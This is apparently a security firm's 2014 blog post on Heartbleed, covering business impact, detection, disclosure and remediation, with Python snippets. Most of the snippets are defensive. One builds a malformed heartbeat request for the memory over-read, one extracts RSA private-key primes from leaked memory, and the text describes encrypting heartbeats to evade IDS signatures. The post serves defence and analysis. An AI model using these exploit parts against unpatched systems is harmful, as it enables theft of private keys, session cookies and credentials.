Leviathan's (Mandatory) Heartbleed Blog Entry


It's been five days since the release of CVE-2014-0160, better known as Heartbleed. This vulnerability affects OpenSSL, the security library used by a significant portion of the web servers on the Internet - perhaps half a million - as well as many other security and encryption products. In this post, we'll provide some insight and detail from the two main viewpoints, Business Risk and Technology, before walking through some considerations which we feel are crucial to concluding an organization's response to the vulnerability.

Business Risk

So much of the effort put forward this week has been about the technology, and many organizations are lagging in the business understanding necessary to deal with vulnerabilities of this size and nature. It's worth stepping back to take a look at the impact, understand the necessary processes, and detail how to deal with the "but if only we had..." statements which tend to swirl around as we attempt to determine who in the organization is ultimately at fault for the cost of remediation.

Impact to Business

This vulnerability affects what is likely the SOLE means of encrypted transport available to most organizations. Whether the perspective is B2C, C2C, or frankly any other direction of communication across the Internet, chances are that if it's secured at all, it's secured with SSL/TLS. This means that what was understood (and risk-assessed as) the minimum necessary encryption for operations on the Internet hasn't really been all that secure. Some organizations will need to re-assess that risk; for others, continuing with the status quo probably makes the most sense, as their competitors will be doing the same.

HTTPS and the padlock icon have become too much a part of modern life for us to attempt to retrain every user to look for, and be on guard for, a new security paradigm. Passwords are hard enough, and maintaining the trust of the public has become a necessity.

Traditionally, organizations faced with a breach or the potential of a breach would quickly work to determine its extent and understand what information may have been included in its scope. Heartbleed brings us a new perspective, as there is no meaningful way to understand what sort of information may have been exfiltrated over the (approximately) two-year period that the vulnerability existed prior to disclosure. Several organizations (notably, the Canada Revenue Agency) have taken their secure sites offline as a precaution until they can be sure that they've correctly identified and solved the problem across all systems.

Necessary Processes

In many organizations, this issue is uncovering some basic processes that are either absent or non-functioning:

  • Who owns SSL keys and certificates?
  • Is this a production support, infrastructure, or security problem?
  • Enterprise key management
  • Incident response
  • Crisis communications

Stay tuned for a follow-up blog post on the topic of well-functioning IT security processes.

What it would've taken to catch the attack

This vulnerability exists at the encryption layer, below the actual application content. Services such as Apache HTTPD do not log errors at this level unless LogLevel is set to Debug. If the HTTPD LogLevel is set to Debug, Apache will report an SSL packet of type 0x18 when it receives a TLS heartbeat request. Other services may create generic logs about TLS errors, but these log entries can be caused by a number of common Internet probes. As a result, unless an organization has complete packet captures from the time of an attack, it's nearly impossible to determine after the fact whether it was attacked before the disclosure.
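As an illustration of the kind of retroactive log review this implies, here is a minimal sketch. The exact log wording varies by Apache/mod_ssl version, so treat the patterns as assumptions to adapt to your own logs:

```python
import re

# Patterns that may indicate TLS heartbeat activity in a debug-level
# mod_ssl error log. The exact wording differs between versions, so
# these regexes are assumptions, not authoritative signatures.
HEARTBEAT_PATTERNS = [
    re.compile(r"type\s*0?x?18", re.IGNORECASE),   # raw record type 24 (0x18)
    re.compile(r"heartbeat", re.IGNORECASE),
]

def find_heartbeat_lines(log_lines):
    """Return log lines that match any heartbeat-related pattern."""
    return [line for line in log_lines
            if any(p.search(line) for p in HEARTBEAT_PATTERNS)]

if __name__ == "__main__":
    sample = [
        "[debug] ssl_engine_io.c: SSL packet of type 0x18 received",
        "[info] mod_ssl: handshake complete",
    ]
    for hit in find_heartbeat_lines(sample):
        print(hit)
```

Remember that most sites never ran at Debug level, so an empty result proves nothing; this is only useful for the rare deployments that did.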

Now that the vulnerability has become public, IDS vendors have put out signatures to detect overly-large TLS Heartbeat Response packets. Some IPS and WAF implementations will block all incoming TLS Heartbeat requests and close the connection.
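The check those signatures perform can be sketched as follows. The size threshold is an assumption to tune for your traffic, and note that only the outer record header is visible when the heartbeat body is encrypted:

```python
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat
MAX_SANE_HEARTBEAT = 64       # threshold in bytes; an assumption to tune

def is_suspicious_record(record: bytes) -> bool:
    """Flag a TLS record that is a heartbeat and larger than expected.

    Only the 5-byte record header (type, version, length) is inspected;
    the body may be encrypted, so the inner payload_length field cannot
    be checked here.
    """
    if len(record) < 5:
        return False
    content_type, version, length = struct.unpack("!BHH", record[:5])
    return content_type == TLS_HEARTBEAT and length > MAX_SANE_HEARTBEAT

# Example: a heartbeat record claiming a 16-KB body
hdr = struct.pack("!BHH", 0x18, 0x0302, 16384)
print(is_suspicious_record(hdr + b"\x00" * 16))
```

This is why the oversized *response* is the practical trigger: a legitimate heartbeat exchange is small, while a successful exploit produces responses tens of kilobytes long.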

This again brings back the need to correctly architect specialized security systems in the deployed environment: IDS, IPS, DLP, and firewalls.

IDS: An IDS could detect this if sensors sit in front of the services being scanned for the vulnerability. There are problems with creating a signature for this vulnerability, though, the first being that the heartbeat payload (which includes the vulnerable length field) can be, and usually is, encrypted. This means that the only reliable approach is to detect the attack post-exploitation and stop extra-large heartbeat messages from leaving the perimeter of the network. The implication is that the placement of your IDS sensors becomes much more important. Back in the dark ages, when IDS was declared dead, it was often considered incorrect to place sensors both inside and outside the significant choke points (firewalls and SSL/VPN terminators), on the grounds that monitoring the efficacy of the choke point wasn't necessary.

IPS: This requires that the IDS be configured in active mode, able to send TCP resets. That DOESN'T help if the traffic is UDP, since DTLS is also vulnerable; the IPS would have to drop packets outright, causing 'instability'. Amazon has attempted to protect its vulnerable AMIs by injecting CLOSE_NOTIFY alerts when a heartbeat comes in. Additionally, Sourcefire recommends against using RST packets, as you could create a local denial-of-service condition (in general, although their product supports it). You would have to dynamically adjust firewall rules whenever you saw this IDS alert, effectively turning your IPS/firewall combination into a game of whack-a-mole.

DLP: Most DLP implementations would not have caught this, because our PoC encrypts the data on the wire and decrypts it locally. DLP requires that outgoing traffic be inspected unencrypted, either prior to encryption or via a gateway service that breaks the end-to-end nature of a proper SSL connection.

What it would've taken to catch the vulnerability

In contemplating whether this class of vulnerability could be detected in an average development organization, we find the answer truly unclear. It is very unlikely that it would be caught through normal testing (QA, UAT) of an application. In all likelihood, there are only two ways to catch this type of vulnerability: either a careful perusal of patches as they are pushed upstream, or a specifically focused code review by developers who specialize in protocol design and implementation.

Preventing the next one

To catch issues that leak this type of information in the future, there are some relatively simple extensions that could be added to analysis tools such as fuzzers. Detecting memory-disclosure bugs is a hard problem: classically, fuzzers detect a 'fault' via a crash or something similar. How could we instrument a fuzzer to detect this issue in other protocols?
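One possible oracle, sketched under the assumption of an echo-style protocol like the TLS heartbeat (the function name is ours): flag any exchange where the peer returns more data than was sent, or data we never sent, rather than waiting for a crash.

```python
def leak_oracle(sent_payload: bytes, response_payload: bytes) -> bool:
    """Return True if a peer echoed back more data than we supplied,
    or data we never sent -- a sign of memory disclosure rather than
    a crash. This is the kind of check a fuzzer could run alongside
    its usual crash detection for echo-style protocol messages.
    """
    if len(response_payload) > len(sent_payload):
        return True
    return not response_payload.startswith(sent_payload[:len(response_payload)])

# A Heartbleed-style exchange: 3 bytes sent, ~1 KB echoed back
print(leak_oracle(b"abc", b"abc" + b"\x9f" * 997))
```

The hard part, of course, is generalizing this beyond echo messages: for most protocol fields a fuzzer has no ground truth for what the response "should" contain.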


Many have commented that this release feels like a marketing release rather than a closely coordinated vulnerability release. Given the scope of the problem, both the hype and the potential issues could have been minimized with a properly coordinated release across as many affected vendors as possible. We're not going to start talking about Responsible Disclosure - save that for a different article. It is sufficient to state that, for business purposes, a coordinated disclosure is much easier to manage than this vulnerability has been. Where possible, participate in (or provide) bug bounty programs, work with CERTs to coordinate releases with vendors, and try to keep the marketing releases to a minimum - although now that we've had a vulnerability with a logo, it's unlikely we'll be able to go back.


Leviathan's Technical Analysis

The technical staff at Leviathan love to solve complex problems. We dug into this early on Monday, and our work continues even now. Our first PoC was built on a modified version of an existing Python TLS library, tlslite. Unlike other PoC code that has been released, our version implemented an encrypted heartbeat payload because, just like TLS alerts, heartbeat payloads can be encrypted and HMACed with the session key. We also added the ability to send multiple heartbeats in a single session, which allows for quick enumeration of data in memory.

In the course of our research we tested both server software (Apache and others) and client software (from a simple wget all the way to Android, XMPP, IRC, and other clients). Most clients and servers that supported heartbeats and were compiled with a vulnerable version of OpenSSL would leak memory easily. Our most astounding finding was that a clean install of Apache on Debian 7.3 would leak SSL private keys.

Heartbeat Protocol Map


TLS heartbeat messages appear in two forms in the protocol. First, during the handshake's ClientHello/ServerHello messages, the heartbeat extension is added to the extension table. If both the client and the server include the heartbeat extension type, then both ends know that they can send a heartbeat message at any time during the post-handshake session. This is critical for our PoC and the attack itself, because it means that after the session is opened it is possible to repeat the heartbeat any number of times to enumerate memory.
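That negotiation check can be sketched as follows: parse a hello's extensions block and look for the heartbeat extension type (0x000F, assigned by RFC 6520). The helper name is our own:

```python
import struct

HEARTBEAT_EXT = 0x000F   # extension type assigned by RFC 6520

def parse_extensions(ext_block: bytes):
    """Parse a TLS hello extensions block into {type: data}.

    ext_block is the byte string that follows the 2-byte total
    extensions length in a ClientHello/ServerHello. Each extension
    is a 2-byte type, a 2-byte length, then that many data bytes.
    """
    exts, offset = {}, 0
    while offset + 4 <= len(ext_block):
        ext_type, ext_len = struct.unpack("!HH", ext_block[offset:offset + 4])
        exts[ext_type] = ext_block[offset + 4:offset + 4 + ext_len]
        offset += 4 + ext_len
    return exts

# A heartbeat extension advertising peer_allowed_to_send (mode 1)
block = struct.pack("!HH", HEARTBEAT_EXT, 1) + b"\x01"
print(HEARTBEAT_EXT in parse_extensions(block))
```

If both hellos carry this extension, the attacker knows heartbeats will be accepted for the life of the session, which is what makes repeated memory enumeration possible.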

The second instance of the heartbeat extension is the actual packet sent in the session. This message is formatted much like any other TLS packet type, such as an alert or application data. The total length and type (0x18) are plaintext, while the body CAN be encrypted, with an HMAC appended - similar to the distinction between an 'encrypted alert' and a non-encrypted alert. Finally, there is the inner body of the message, which contains a type (request or response), a length, a payload, and finally padding - much like an ICMP ping message, which allows the requester to send arbitrary data in the heartbeat to verify upon its return from the peer. The vulnerability exists in the inner length field, which specifies the length of the payload. If sent a small payload with a large length value, OpenSSL will read beyond the bounds of the buffer, and this data is then promptly returned. The vulnerability is classified by MITRE as a "buffer over-read", which in this case leads to what you can think of as a variant of an "arbitrary memory read": an attacker requests that OpenSSL read and return more memory than has been allocated to it, and due to the lack of bounds checking, OpenSSL is happy to oblige.
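Assuming an unencrypted session (our actual PoC encrypts and HMACs the payload), the malicious message can be sketched in a few lines. The field layouts follow RFC 6520; the function name is ours:

```python
import struct

def build_heartbeat_record(claimed_len: int, payload: bytes = b"") -> bytes:
    """Build an unencrypted TLS heartbeat request record (RFC 6520).

    The inner payload_length field is set to claimed_len regardless of
    how much payload is actually supplied; a vulnerable OpenSSL echoes
    claimed_len bytes back, reading past the end of the real buffer.
    """
    # Inner heartbeat message: type=0x01 (request), payload_length, payload
    inner = struct.pack("!BH", 0x01, claimed_len) + payload
    # Outer TLS record: content type 0x18 (heartbeat), version TLS 1.1,
    # record length -- this outer length is honest; only the inner lies.
    return struct.pack("!BHH", 0x18, 0x0302, len(inner)) + inner

# Claim a 16-KB payload while sending none at all
record = build_heartbeat_record(claimed_len=0x4000)
print(record.hex())
```

The mismatch is visible in the output: the outer record says the body is 3 bytes, while the inner length field claims 0x4000.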

One of the major issues we identified with many of the public PoCs released since the Heartbleed announcement is that the inner heartbeat packet was not encrypted, giving IDS signature writers a false sense that they could match a large heartbeat and block it. We established that with our PoC, both the request and response data are encrypted, making it much harder to match the packet by signature; the remaining option is to detect the exploit after the fact and block the data as it leaves the perimeter.

Developing a PoC that Extracts Private Keys

The code for this proof of concept, including the automatic private key finder, is available in our forked tlslite. We have been able to easily modify this script to search for any data we are interested in, including HTTP headers (Cookie, Authorization, and others). The sensitive data potentially exposed by clients is harder to gauge; any client built with OpenSSL could potentially leak information. While we were unable to test OpenVPN due to its extra protocol layers, we did see its client sending heartbeat messages - most likely because DTLS (which OpenVPN uses) needs something like a heartbeat.
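The key-finding idea can be illustrated with a toy sketch (the function and its parameters are hypothetical illustrations, not our production code): slide a window across the leaked bytes and test each candidate as a divisor of the certificate's RSA modulus. Finding either prime is enough to reconstruct the whole private key.

```python
def find_prime_factor(modulus: int, leaked: bytes, prime_bytes: int = 128):
    """Scan leaked memory for a prime factor of an RSA modulus.

    For a 2048-bit key each prime is 128 bytes (prime_bytes). The
    in-memory byte order of OpenSSL's bignums depends on the platform,
    so both orders are tried at every window position.
    """
    for i in range(len(leaked) - prime_bytes + 1):
        window = leaked[i:i + prime_bytes]
        for order in ("big", "little"):
            candidate = int.from_bytes(window, order)
            if candidate > 1 and modulus % candidate == 0:
                return candidate
    return None

# Toy demo with a tiny modulus: n = 61 * 53 = 3233, 1-byte "primes"
print(find_prime_factor(3233, b"\x00\x3d\x07", prime_bytes=1))
```

The trial division makes false positives essentially impossible: a random 128-byte window dividing the modulus exactly is, for practical purposes, proof that you have recovered a key prime.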


There are a number of facets of this vulnerability (and this class of vulnerability) that are not well understood and are being lost in the general noise around its server side.


More than just patching

In addition to patching, regenerating private keys, re-issuing certificates, and revoking previous certificates on your web servers, there is much work to do.

Other Servers: This affects everything that uses an unpatched OpenSSL library for SSL or TLS - not just web servers but mail servers, VPN servers, unified communications servers, and more. And not just services that run on TCP: DTLS on UDP is also affected.

Evaluate Versions Carefully: Many installations do not provide conclusive detail about the OpenSSL version actually running; distribution packages often backport security fixes without changing the reported version number.

Examine Libraries: There are all kinds of places where you might find the OpenSSL library. On Windows systems, search for ssleay32.dll and check the Properties | Details tab. Be aware of products that may have statically compiled OpenSSL into the executables you're using.
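A quick way to hunt for statically compiled copies is to search binaries for OpenSSL's embedded version banner (e.g. "OpenSSL 1.0.1e 11 Feb 2013"). This sketch assumes that banner format; treat any hit in the 1.0.1 range as a prompt for closer inspection, not a verdict, since fixes may have been backported without a version bump:

```python
import re
from pathlib import Path

# OpenSSL embeds a version banner such as "OpenSSL 1.0.1e 11 Feb 2013"
# in its binaries; statically linked copies carry it too. Versions
# 1.0.1 through 1.0.1f are Heartbleed-vulnerable unless patched.
VERSION_RE = re.compile(rb"OpenSSL \d\.\d\.\d[a-z]?")

def find_openssl_banners(path: str):
    """Return the OpenSSL version strings embedded in a binary file."""
    data = Path(path).read_bytes()
    return sorted({m.group().decode() for m in VERSION_RE.finditer(data)})
```

Run it across your executables, DLLs, and shared objects; anything reporting 1.0.1 through 1.0.1f deserves a follow-up with the vendor.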

Inform Customers: Tell them not only that you've fixed the issue; take the opportunity to do a little awareness training and teach them how to turn on checks for certificate revocation.

Client Issues: Emphasis in the last few days has been on vulnerable servers, with little mention of client-side applications. We are actively investigating the impact on client-side applications; expect a follow-up blog post to go into some detail.

To Developers and IT Operations

As we mature in developing secure software, we have to take a good hard look at some of these fundamental parts of our infrastructure. If you are leveraging one of these products to support a commercial service, make sure that you're going through its code as you would your own, and that when you find issues, you are sending patches upstream. Static linking of libraries like libssl will insulate you from changes to interfaces and functionality, but the approach can pose a significant threat to your application and to your clients if your security notification and patching processes are not in line with the affected libraries. Seriously consider using dynamic linking to reduce your customers' reliance on your patching and notification process for common libraries.

OpenSSL - the organization

OpenSSL, like many of the fundamental pieces of infrastructure utilized by millions daily, is a volunteer effort. If each company that makes use of OpenSSL were to donate even $5, there would be enough money available to the OpenSSL Foundation to hire the experienced staff necessary to conduct formal third-party code audits. Non-profit organizations like the Center for Internet Security, FIRST, and MITRE should take a hard look at how they can provide more support in software and protocol evaluation.

Thanks to all of the Leviathan staff that contributed to this posting:

Paul Brodeur, Daniel McCarney, Baron Oldenburg, Josh Pitts, Parker Thompson, Chad Thunberg.